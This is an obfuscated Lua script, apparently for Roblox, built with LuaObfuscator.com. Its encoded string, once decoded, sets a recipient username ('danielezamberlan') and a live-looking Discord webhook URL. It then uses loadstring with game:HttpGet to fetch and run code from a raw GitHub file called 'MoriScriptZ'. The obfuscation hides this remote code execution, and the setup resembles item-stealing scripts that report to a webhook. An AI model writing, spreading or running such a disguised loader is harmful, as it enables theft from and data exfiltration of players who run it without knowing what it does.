--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v97=v5(v84,v19);v19=nil;return v97;else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/((879 -(282 + 595))^(v32-1)))%((3 -(1638 -(1523 + 114)))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 67 + 7)))) ;return v86-(v86%1) ;end end else local v87=((812 -242) -(367 + 201))^(v32-((1993 -(68 + 997)) -(214 + (1983 -(226 + 1044))))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=(0 -0) -0 ;local v35;while true do if (v34==(118 -(32 + (157 -72)))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=958 -(892 + 65) ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(350 -(87 + 263))) then v37,v38=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;v36=2 -1 ;end if (v36==(1 + 0)) then return (v38 * 256) + v37 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;return (v42 * ((45170937 -(915 + 82)) -28392724)) + (v41 * (118879 -53343)) + (v40 * (187 + 69)) + v39 ;end local function v24()local v43=0 -(0 -0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 + 1)) then if (v48==(0 -0)) then if (v47==(1187 -(1069 + 118))) then return v49 * (0 -0) ;else v48=1 -0 ;v46=0 + 0 ;end elseif (v48==(3636 -1589)) then return ((v47==(0 + 0)) and (v49 * (1/(791 -(368 + 423))))) or (v49 * NaN) ;end return v8(v49,v48-(3214 -(7780 -5589)) ) * (v46 + (v47/(2^(70 -(10 + 8))))) ;end if (v43==((862 -(814 + 45)) -2)) then v46=1;v47=(v20(v45,(1091 -648) -(416 + 2 + 24) ,20) * ((6 -4)^(14 + 18))) + v44 ;v43=3 -1 ;end if (v43==(440 -(145 + 293))) then v48=v20(v45,451 -(44 + 386) ,1517 -(998 + 488) );v49=((v20(v45,32)==(1 + 0)) and  -(1 + 0)) or ((274 + 499) -(201 + (1456 -(261 + 624)))) ;v43=(2027 -886) -(116 + (2102 -(1020 + 60))) ;end if (v43==(0 -(1423 -(630 + 793)))) then v44=v23();v45=v23();v43=1 + 0 ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(4 -3) );v18=v18 + v50 ;local v52={};for v67=1 + 0 , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=290 -(60 + 230) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((755 -(239 + 514))~=v53) then else v58=nil;v59=nil;v53=2 + 1 ;end if (3~=v53) then else v60=nil;while true do local v90=0;while true do if (v90~=(572 -(426 + 146))) then else if (v54==0) then local v98=0 + 0 ;while true do if (v98~=(1456 -(282 + 1174))) then else local v106=0 -0 ;while true do if ((812 -(569 + 242))==v106) then v98=1203 -(373 + 829) ;break;end if (v106~=(731 -(476 + 255))) then else v55={};v56={};v106=1;end end end if (v98==(1132 -(369 + 761))) then v54=1;break;end if (v98~=(1 + 0)) then else local v107=0 -0 ;while true do if (v107~=(0 -0)) then else v57={};v58={v55,v56,nil,v57};v107=337 -(144 + 192) ;end if (v107~=(1025 -(706 + 318))) then else v98=1253 -(721 + 530) ;break;end end end end end if ((1 + 0)==v54) then local v99=0 + 0 ;while true do if (v99==(1506 -(363 + 1141))) then v54=1582 -(1183 + 397) ;break;end if (0==v99) then local v108=1271 -(945 + 326) ;while true do if ((2 -1)~=v108) then else v99=1 + 0 ;break;end if (v108~=(700 -(271 + 429))) then else v59=v23();v60={};v108=1;end end end if (1==v99) then local v109=0 + 0 ;while true do if (1~=v109) then else v99=1502 -(1408 + 92) ;break;end if (v109==(1975 -(1913 + 62))) then for v149=1 + 0 ,v59 do local v150=0;local v151;local v152;local v153;while true do if (v150==1) then v153=nil;while true do if (v151==(1086 -(461 + 625))) then local v171=1288 -(993 + 295) ;local v172;while true do if (v171==(0 + 0)) then v172=0 -0 ;while true do if (v172~=(1172 -(418 + 753))) then else v151=1 -0 ;break;end if (v172~=(0 + 0)) then else local v185=0;while true do if ((0 + 0)~=v185) then else v152=v21();v153=nil;v185=1 + 0 ;end if (v185==(1 + 0)) then v172=857 -(564 + 292) ;break;end end end end break;end end end if (v151~=(530 -(406 + 123))) then else if (v152==1) then v153=v21()~=(0 -0) ;elseif (v152==(1771 -(1749 + 20))) then v153=v24();elseif (v152~=(3 + 0)) then else v153=v25();end v60[v149]=v153;break;end end break;end if (v150==(0 + 0)) then local v168=1322 -(1249 + 73) ;while true do if (v168==1) then v150=1 + 0 ;break;end if (v168==(0 + 0)) then v151=1145 -(466 + 679) ;v152=nil;v168=2 -1 ;end end end end end v58[3]=v21();v109=1 + 0 ;end end end end end v90=2 -1 ;end if (v90==(1901 -(106 + 1794))) then if (v54~=(1 + 1)) then else for v100=1 + 0 ,v23() do local v101=0 -0 ;local v102;local v103;while true do if (v101~=(2 -1)) then else while true do if (0==v102) then v103=v21();if (v20(v103,115 -(4 + 110) ,585 -(57 + 527) )==(1427 -(41 + 1386))) then local v163=103 -(17 + 86) ;local v164;local v165;local v166;local v167;while true do if (v163~=(2 + 0)) then else while true do if (v164~=(1878 -(157 + 1718))) then else if (v20(v166,3 + 0 ,3)~=(1 -0)) then else v167[4]=v60[v167[4]];end v55[v100]=v167;break;end if ((3 -2)==v164) then local v175=0;while true do if (v175~=1) then else v164=6 -4 ;break;end if ((1018 -(697 + 321))==v175) then local v183=0;while true do if (v183~=(0 -0)) then else v167={v22(),v22(),nil,nil};if (v165==(0 -0)) then local v186=0 -0 ;local v187;while true do if (v186==(0 + 0)) then v187=0;while true do if ((0 -0)~=v187) then else v167[3]=v22();v167[1 + 3 ]=v22();break;end end break;end end elseif (v165==(1 -0)) then v167[68 -(30 + 35) ]=v23();elseif (v165==(2 + 0)) then v167[1260 -(1043 + 214) ]=v23() -(2^(888 -(826 + 46))) ;elseif (v165~=(11 -8)) then else local v198=0;local v199;local v200;while true do if (v198==(1213 -(323 + 889))) then while true do if ((0 -0)~=v199) then else v200=0 -0 ;while true do if ((1898 -(260 + 1638))==v200) then v167[583 -(361 + 219) ]=v23() -((322 -(53 + 267))^(4 + 12)) ;v167[417 -(15 + 398) ]=v22();break;end end break;end end break;end if (v198~=(982 -(18 + 964))) then else v199=0 -0 ;v200=nil;v198=1 + 0 ;end end end v183=1 -0 ;end if (v183==(3 -2)) then v175=2 -1 ;break;end end end end end if (v164~=(0 + 0)) then else local v176=0;local v177;local v178;while true do if (v176~=(1205 -(902 + 303))) then else v177=0 -0 ;v178=nil;v176=1 + 0 ;end if ((2 -1)~=v176) then else while true do if (v177~=0) then else v178=0 + 0 ;while true do if (v178~=1) then else v164=851 -(20 + 830) ;break;end if (v178~=(0 + 0)) then else local v192=214 -(22 + 192) ;local v193;while true do if (v192~=(683 -(483 + 200))) then else v193=1463 -(1404 + 59) ;while true do if (v193~=(0 -0)) then else local v201=126 -(116 + 10) ;while true do if (v201==(765 -(468 + 297))) then v165=v20(v103,2,1 + 2 );v166=v20(v103,742 -(542 + 196) ,13 -7 );v201=1 -0 ;end if (v201==1) then v193=1 + 0 ;break;end end end if (v193~=(1 -0)) then else v178=1 + 0 ;break;end end break;end end end end break;end end break;end end end if (v164==(2 + 0)) then local v179=0 + 0 ;while true do if (v179==(0 -0)) then local v184=0 + 0 ;while true do if (v184==1) then v179=2 -1 ;break;end if (v184~=(1551 -(1126 + 425))) then else if (v20(v166,406 -(118 + 287) ,3 -2 )==(1122 -(118 + 1003))) then v167[5 -3 ]=v60[v167[2]];end if (v20(v166,5 -3 ,2)~=1) then else v167[380 -(142 + 235) ]=v60[v167[2 + 1 ]];end v184=1 -0 ;end end end if (v179==(4 -3)) then v164=166 -(92 + 71) ;break;end end end end break;end if (v163==(1 + 0)) then local v169=0 + 0 ;while true do if (v169~=(1 -0)) then else v163=2;break;end if (v169==(977 -(553 + 424))) then local v180=0 -0 ;while true do if (v180~=0) then else v166=nil;v167=nil;v180=1 + 0 ;end if (v180~=(1 + 0)) then else v169=1 + 0 ;break;end end end end end if (v163==(0 -0)) then local v170=0 + 0 ;while true do if (v170==(849 -(254 + 595))) then v164=0 + 0 ;v165=nil;v170=1 + 0 ;end if (v170==(1 + 0)) then v163=1791 -(573 + 1217) ;break;end end end end end break;end end break;end if (v101~=0) then else v102=0;v103=nil;v101=1;end end end for v104=2 -1 ,v23() do v56[v104-1 ]=v28();end return v58;end break;end end end break;end if (v53~=(0 + 0)) then else v54=0 -0 ;v55=nil;v53=2 -1 ;end if (v53==(2 -1)) then v56=nil;v57=nil;v53=1 + 1 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v89=0;while true do if (v89==0) then v81=v69[v73];v82=v81[1];v89=1;end if (v89==1) then if (v82<=8) then if (v82<=3) then if (v82<=1) then if (v82==0) then do return;end else local v110=v81[2];local v111=v79[v81[3]];v79[v110 + 1 ]=v111;v79[v110]=v111[v81[4]];end elseif (v82>2) then v79[v81[2]]=v81[3];else local v117=v81[2];local v118,v119=v72(v79[v117](v13(v79,v117 + 1 ,v81[3])));v74=(v119 + v117) -1 ;local v120=0;for v141=v117,v74 do v120=v120 + 1 ;v79[v141]=v118[v120];end end elseif (v82<=5) then if (v82==4) then v79[v81[2]]=v81[3]~=0 ;else local v122=0;local v123;local v124;while true do if (v122==0) then v123=v81[2];v124=v79[v81[3]];v122=1;end if (v122==1) then v79[v123 + 1 ]=v124;v79[v123]=v124[v81[4]];break;end end end elseif (v82<=6) then local v125=v81[2];v79[v125]=v79[v125](v13(v79,v125 + 1 ,v74));elseif (v82==7) then do return;end else v79[v81[2]]=v63[v81[3]];end elseif (v82<=12) then if (v82<=10) then if (v82==9) then v79[v81[2]]=v81[3]~=0 ;else local v128=0;local v129;local v130;local v131;local v132;while true do if (v128==0) then v129=v81[2];v130,v131=v72(v79[v129](v13(v79,v129 + 1 ,v81[3])));v128=1;end if (v128==2) then for v160=v129,v74 do v132=v132 + 1 ;v79[v160]=v130[v132];end break;end if (v128==1) then v74=(v131 + v129) -1 ;v132=0;v128=2;end end end elseif (v82==11) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]=v81[3];end elseif (v82<=14) then if (v82==13) then v79[v81[2]]();else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=15) then v79[v81[2]]=v63[v81[3]];elseif (v82>16) then local v147=v81[2];v79[v147]=v79[v147](v13(v79,v147 + 1 ,v74));else v79[v81[2]]();end v73=v73 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003023O005F4703083O00557365724E616D6503103O0064616E69656C657A616D6265726C616E03093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132302O373532313739302O3830393836392F796E486D71514A654462576153636B41354841455352437038397751494B695F387052467646426A5A446933653633315F6A446834524C6C6E4D796753426B4877323169030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O00120F3O00013O00300E3O0002000300120F3O00013O00300E3O0004000300120F3O00013O00300E3O0005000600120F3O00073O00120F000100083O0020010001000100090012030003000A4O0009000400014O000A000100044O00065O00022O000D3O000100016O00017O00",v9(),...);end
